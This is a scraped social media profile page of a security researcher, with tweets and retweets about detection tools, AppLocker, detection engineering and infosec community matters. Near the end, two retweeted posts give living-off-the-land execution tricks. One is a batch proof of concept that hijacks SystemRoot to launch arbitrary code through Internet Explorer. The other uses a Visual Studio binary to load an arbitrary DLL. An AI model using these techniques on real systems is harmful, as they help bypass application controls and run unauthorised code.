Conor Richard

@xenosCR

Followers
1K
Following
13K
Media
192
Statuses
3K

Cyber, OSCE, OSWE, OSCP Certified, Knowledge Seeker, and my opinions are my own.

Joined January 2015
@xenosCR
Conor Richard
4 years
I did a bit of research and learning and have blogged about it and released some code. I wanted to understand Nirvana Hooks, specifically in x86. So I did a thing: https://t.co/EaygKMJmmb https://t.co/8eNYoiJ8Tg
github.com
A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks. - xenoscr/manual-syscall-detect
@Oddvarmoe
Oddvar Moe
3 years
Well well! Microsoft removed the Windows version checks to use AppLocker! Everyone can now use AppLocker! https://t.co/s0gqOJys9M
@anton_chuvakin
Dr. Anton Chuvakin
3 years
I love detection engineering, I think it is awesome and hugely needed, and it's the future and all that. But I have no idea how to talk about it to a team of 1 (ONE) running a SIEM ...
@paradoxengine
Claudio Criscione
3 years
Repeat after me: vulnerability management is not incident response. We see an RCE a week, why do we randomly select a few to be OMGTHISBAD and scramble? All those other RCEs being discriminated are sad... and still popping you.
@LitMoose
Moose
3 years
Show me a person who blames the EDR, and 9.9 times out of 10 I'll show you someone who doesn't understand: DNS FW rules Noisy Dev jobs GPO Gapping Bad config Scanners You need something on your endpoints that auto-blocks crud, but you still have to fix your internal problems.
@xenosCR
Conor Richard
3 years
Technically unemployed for a few days. New adventures await starting Monday!
@jsnover
Jeffrey Snover
3 years
Priorities are not what you say, they are what you fund. Culture is not what you say, it's what you reward. Action is a lie detector.
@DuneQuoteBot
Dune Quotes
3 years
Once men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.
@med0x2e
Mohamed El Azaar
3 years
@HackingLZ Some immature companies (e.g. no SIEM or whatever) tend to go for RTs before PTs for leverage, mainly to get management to take a seat in the same room, listen, and take security more seriously ($$$).
@bohops
bohops
3 years
I guess the general points are:
- We need more people to contribute to the profession
- We need to encourage people to share (coaching and validation are acceptable)
- The community that shares defensive content is smaller IMO. It would be great to see others in this space
@bohops
bohops
3 years
The leap that it takes to publicly share infosec knowledge/content is generally underappreciated. Often, folks who want to share with the community do not out of anxiety/fear of acceptance/etc. And then, there is the asymmetry of those who share offensive content vs defensive.
@nas_bench
Nasreddine Bencherchali
3 years
I love how when someone shares an offensive tool he gets praised. But when a blue teamer shares a detection he's told that it's bypassable/weak. 🤫
@bohops
bohops
3 years
Be a perpetual student. Expertise is a snapshot in time that eventually fades away.
@bohops
bohops
3 years
#LOLBAS hit 5000 stars on GitHub to bring in the New Year! Thank you all for the support over the years - it truly is a community project! Big shout out to @Oddvarmoe🙏, @xenosCR, @ConsciousHacker, @liamsomerville, @Wietze, and @_josehelps for all the hard work to keep it going!
@xenosCR
Conor Richard
3 years
This is bad. What about accounts of the deceased? Things that should remain part of the public record?
@elonmusk
Elon Musk
3 years
Twitter will soon start freeing the name space of 1.5 billion accounts
@PortSwiggerRes
PortSwigger Research
3 years
Stealing passwords from infosec Mastodon - without bypassing CSP https://t.co/kXIqj3tpAU
@Intel471Inc
Intel 471
3 years
Intel 471 is deeply saddened by the tragic news of Vitali Kremez's untimely passing. We extend our deepest condolences to his family, friends and his Advance Intelligence Team during this challenging time.
@xenosCR
Conor Richard
3 years
Not saying I'm moving but just in case, I joined mastodon as: https://ioc[.]exchange/web/@xenoscr Anyone that I follow here or who follows me, I'd be happy to connect.
@HackingDave
Dave Kennedy
3 years
Good life lesson: Hurt people, hurt people. Took me a while to not worry or care about the people that aren't happy for others' successes or for others' positivity to help people or make a positive difference in others' lives. They are the unhappy ones. I hope they find happiness.
@notwhickey
¬ whickey
3 years
POC: mkdir %temp%\System32 FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL set a=C:\Windows\System32\calc.exe copy %a% %temp%\System32\rstrui.exe /Y > NUL set SystemRoot=%temp% start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}
@notwhickey
¬ whickey
3 years
Have you ever considered Internet Explorer to be a #lolbin? By navigating to URI: `shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}` you can spawn `rstrui.exe` (System Restore). If you modify the `SystemRoot` environment variable and copy over DLLs you can run whatever you like.
@bohops
bohops
3 years
The "Visual Studio Live Share" binary is a fun #LOLBIN to load an arbitrary DLL from the cmdline: vsls-agent.exe --agentExtensionPath c:\path\to\your.dll